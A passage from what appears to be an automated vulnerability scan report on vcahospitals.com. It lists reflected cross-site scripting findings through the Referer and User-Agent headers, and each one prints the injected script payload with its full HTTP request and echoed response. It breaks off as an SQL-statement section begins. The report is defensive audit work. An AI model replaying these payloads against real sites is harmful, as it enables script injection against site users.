User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.1393282"><script>alert(1)</script>5b7938f8052
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:05:02 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=psqbs3kc8ulu01cr19pld79dp0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10784

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.1393282"><script>alert(1)</script>5b7938f8052" />
...[SNIP]...

2.128. http://www.vcahospitals.com/main/offer/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9378"><script>alert(1)</script>0a72e423827 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /main/offer/?&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.google.com/search?hl=en&q=d9378"><script>alert(1)</script>0a72e423827
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:38 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14608

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="http://www.google.com/search?hl=en&q=d9378"><script>alert(1)</script>0a72e423827" />
...[SNIP]...

2.129. http://www.vcahospitals.com/main/offer/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8614f"><script>alert(1)</script>cee15d78e68 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /main/offer/?&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)8614f"><script>alert(1)</script>cee15d78e68
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:31 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="useragent" id="useragent" value="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)8614f"><script>alert(1)</script>cee15d78e68" />
...[SNIP]...

2.130. http://www.vcahospitals.com/main/offer/thank-you.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/thank-you.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95362"><script>alert(1)</script>05c6e8d8221 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

POST /main/offer/thank-you.html? HTTP/1.1
Referer: http://www.google.com/search?hl=en&q=95362"><script>alert(1)</script>05c6e8d8221
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 448

fname=&lname=&addr=&city=&state&zip=&phone=&email=&optin=on&pettype&other=&petname=&petage=&variant=&submit=Get+FREE+Coupon&token=917e022cccb7f727295d2ccceeb0579c&guid=2505B0C6-B6AA-4144-878F-54873D35
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:24:55 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3534
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=95362"><script>alert(1)</script>05c6e8d8221&&optin=1&guid=2505B0C6-B6AA-4144-878F-54873D353284">
...[SNIP]...

2.131. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /manhattan-veterinary-group/appt.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db8d4"><script>alert(1)</script>1f48bc76e1e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /manhattan-veterinary-group/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665
Referer: http://www.google.com/search?hl=en&q=db8d4"><script>alert(1)</script>1f48bc76e1e

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:29 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="http://www.google.com/search?hl=en&q=db8d4"><script>alert(1)</script>1f48bc76e1e" />
...[SNIP]...

2.132. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /manhattan-veterinary-group/appt.html

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 563f8"><script>alert(1)</script>d249be92d3d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /manhattan-veterinary-group/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13563f8"><script>alert(1)</script>d249be92d3d
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:17 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13563f8"><script>alert(1)</script>d249be92d3d" />
...[SNIP]...

2.133. http://www.vcahospitals.com/marshfield/appt.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /marshfield/appt.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e160"><script>alert(1)</script>15cad895a97 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /marshfield/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=3e160"><script>alert(1)</script>15cad895a97
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:29 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21656

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="http://www.google.com/search?hl=en&q=3e160"><script>alert(1)</script>15cad895a97" />
...[SNIP]...

2.134. http://www.vcahospitals.com/marshfield/appt.html [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /marshfield/appt.html

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca082"><script>alert(1)</script>1249627b9a5 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /marshfield/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/marshfield
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13ca082"><script>alert(1)</script>1249627b9a5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:23 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13ca082"><script>alert(1)</script>1249627b9a5" />
...[SNIP]...

2.135. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80127"><script>alert(1)</script>19dd3cfa8d8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /new-york-veterinary-hospital/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665
Referer: http://www.google.com/search?hl=en&q=80127"><script>alert(1)</script>19dd3cfa8d8

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:29 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="http://www.google.com/search?hl=en&q=80127"><script>alert(1)</script>19dd3cfa8d8" />
...[SNIP]...

2.136. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec59a"><script>alert(1)</script>132741cca0f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /new-york-veterinary-hospital/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13ec59a"><script>alert(1)</script>132741cca0f
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:13 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13ec59a"><script>alert(1)</script>132741cca0f" />
...[SNIP]...

2.137. http://www.vcahospitals.com/plymouth/appt.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /plymouth/appt.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 483eb"><script>alert(1)</script>df4b8d58b4d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /plymouth/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665
Referer: http://www.google.com/search?hl=en&q=483eb"><script>alert(1)</script>df4b8d58b4d

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:12 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 22040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="http://www.google.com/search?hl=en&q=483eb"><script>alert(1)</script>df4b8d58b4d" />
...[SNIP]...

2.138. http://www.vcahospitals.com/plymouth/appt.html [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /plymouth/appt.html

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d01dc"><script>alert(1)</script>4fe18f93ad was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /plymouth/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13d01dc"><script>alert(1)</script>4fe18f93ad
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:04 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 22002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13d01dc"><script>alert(1)</script>4fe18f93ad" />
...[SNIP]...

3. SQL statement in request parameter
There are 4 instances of this issue:

Issue description

The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.

You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.

Issue remediation

The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.


3.1. http://www.vcahospitals.com/main/offer

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.vcahospitals.com
Path:   /main/offer

Request

